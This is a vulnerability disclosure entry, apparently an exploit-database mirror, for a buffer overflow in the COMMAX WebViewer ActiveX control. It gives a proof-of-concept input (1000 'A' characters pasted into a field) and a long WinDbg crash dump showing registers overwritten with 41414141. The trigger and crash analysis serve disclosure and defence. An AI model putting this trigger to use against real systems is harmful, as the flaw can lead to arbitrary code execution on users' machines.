扫码分享
验证:
体验盒子# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 2.1.4.5
Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.
Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a buffer
overflow when a user inserts overly long array of string bytes
through several functions. Successful exploitation could allow
execution of arbitrary code on the affected node.
Tested on: Microsoft Windows 10 Home (64bit) EN
Microsoft Internet Explorer 20H2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5663
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php
02.08.2021
--
$ python
>>> "A"*1000 [ToTheClipboard]
>>>#Paste in ID or anywhere
(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64pNotifyDebugger+0x19918:
00007ff9`deb0b530 c644242001mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
0:038> g
(5220.5b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aarep stos byte ptr es:[edi]
0:038:x86> r
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc
cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010246
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aarep stos byte ptr es:[edi]
0:038:x86> !exchain
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
CRT scope0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
Invalid exception stack at ffffffff
0:038:x86> kb
# ChildEBP RetAddrArgs to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
0:038:x86> d esp
0d78f9200f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b...........vx.~.
0d78f930b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00..~..]@.AAAA....
0d78f94000 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00. ......x.~.....
0d78f95010 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00.^.u%.@...x. ...
0d78f96000 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00.i.a..x.........
0d78f97010 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76..........x.W(.v
0d78f98070 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76p:...........(.v
0d78f99000 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00............t...
0:038:x86> d ebp
0d78f930b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00..~..]@.AAAA....
0d78f94000 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00. ......x.~.....
0d78f95010 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00.^.u%.@...x. ...
0d78f96000 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00.i.a..x.........
0d78f97010 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76..........x.W(.v
0d78f98070 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76p:...........(.v
0d78f99000 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00............t...
0d78f9a08c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00................
0:038:x86> d esi
41414141?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
41414151?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
41414161?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
41414171?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
41414181?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
41414191?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
414141a1?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
414141b1?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
0:038:x86> !analyze -v
*******************************************************************************
* *
*Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found.Defaulted to export symbols for ie_to_edge_bho.dll -
*** ERROR: Symbol file could not be found.Defaulted to export symbols for Commax_WebViewer.OCX -
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aarep stos byte ptr es:[edi]
EXCEPTION_RECORD:(.exr -1)
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 41414141
Attempt to write to address 41414141
FAULTING_THREAD:00005b30
DEFAULT_BUCKET_ID:INVALID_POINTER_WRITE
PROCESS_NAME:IEXPLORE.EXE
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR:c0000005
EXCEPTION_PARAMETER1:00000001
EXCEPTION_PARAMETER2:41414141
FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aarep stos byte ptr es:[edi]
WRITE_ADDRESS:41414141
WATSON_BKT_PROCSTAMP:95286d96
WATSON_BKT_PROCVER:11.0.19041.1
PROCESS_VER_PRODUCT:Internet Explorer
WATSON_BKT_MODULE:CNC_Ctrl.DLL
WATSON_BKT_MODSTAMP:547ed821
WATSON_BKT_MODOFFSET:1043bf
WATSON_BKT_MODVER:1.7.0.2
MODULE_VER_PRODUCT:CNC_Ctrl Module
BUILD_VERSION_STRING:10.0.19041.1023 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH:aadfa1c5bdd8f77b979f6a5b222994db450b715e
MODLIST_SHA1_HASH:849cfdbdcb18d5749dc41f313fc544a643772db9
NTGLOBALFLAG:0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS:0
PRODUCT_TYPE:1
SUITE_MASK:784
DUMP_TYPE:fe
ANALYSIS_SESSION_HOST:LAB17
ANALYSIS_SESSION_TIME:08-12-2021 14:20:11.0116
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE:ENU
PROBLEM_CLASSES:
ID: [0n301]
Type: [@ACCESS_VIOLATION]
Class:Addendum
Scope:BUCKET_ID
Name: Omit
Data: Omit
PID:[Unspecified]
TID:[0x5b30]
Frame:[0] : CNC_Ctrl!DllUnregisterServer
ID: [0n274]
Type: [INVALID_POINTER_WRITE]
Class:Primary
Scope:DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID:[Unspecified]
TID:[0x5b30]
Frame:[0] : CNC_Ctrl!DllUnregisterServer
ID: [0n152]
Type: [ZEROED_STACK]
Class:Addendum
Scope:BUCKET_ID
Name: Add
Data: Omit
PID:[0x5220]
TID:[0x5b30]
Frame:[0] : CNC_Ctrl!DllUnregisterServer
BUGCHECK_STR:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
PRIMARY_PROBLEM_CLASS:APPLICATION_FAULT
LAST_CONTROL_TRANSFER:from 0b405dea to 0b4d43bf
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
THREAD_SHA1_HASH_MOD_FUNC:e84e62df4095d241971250198ae18de0797cfdc7
THREAD_SHA1_HASH_MOD_FUNC_OFFSET:2033316a7c1a92aaeab1ce97e013350953fef546
THREAD_SHA1_HASH_MOD:6d850af928076b326edbcafdf6dd4f771aafbab5
FAULT_INSTR_CODE:458baaf3
SYMBOL_STACK_INDEX:0
SYMBOL_NAME:CNC_Ctrl!DllUnregisterServer+f5501
FOLLOWUP_NAME:MachineOwner
MODULE_NAME: CNC_Ctrl
IMAGE_NAME:CNC_Ctrl.DLL
DEBUG_FLR_IMAGE_TIMESTAMP:547ed821
STACK_COMMAND:~38s ; .cxr ; kb
FAILURE_BUCKET_ID:INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
BUCKET_ID:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501
FAILURE_EXCEPTION_CODE:c0000005
FAILURE_IMAGE_NAME:CNC_Ctrl.DLL
BUCKET_ID_IMAGE_STR:CNC_Ctrl.DLL
FAILURE_MODULE_NAME:CNC_Ctrl
BUCKET_ID_MODULE_STR:CNC_Ctrl
FAILURE_FUNCTION_NAME:DllUnregisterServer
BUCKET_ID_FUNCTION_STR:DllUnregisterServer
BUCKET_ID_OFFSET:f5501
BUCKET_ID_MODTIMEDATESTAMP:547ed821
BUCKET_ID_MODCHECKSUM:357a4b
BUCKET_ID_MODVER_STR:1.7.0.2
BUCKET_ID_PREFIX_STR:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
FAILURE_PROBLEM_CLASS:APPLICATION_FAULT
FAILURE_SYMBOL_NAME:CNC_Ctrl.DLL!DllUnregisterServer
WATSON_STAGEONE_URL:http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1
TARGET_TIME:2021-08-12T12:21:50.000Z
OSBUILD:19042
OSSERVICEPACK:1023
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE:x64
OSNAME:Windows 10
OSEDITION:Windows 10 WinNt SingleUserTS Personal
USER_LCID:0
OSBUILD_TIMESTAMP:unknown_date
BUILDDATESTAMP_STR:160101.0800
BUILDLAB_STR:WinBuild
BUILDOSVER_STR:10.0.19041.1023
ANALYSIS_SESSION_ELAPSED_TIME:1d869
ANALYSIS_SOURCE:UM
FAILURE_ID_HASH_STRING:um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
FAILURE_ID_HASH:{5e1e375a-c411-e928-cd64-b7f6c07eea3b}
Followup: MachineOwner
---------
体验盒子
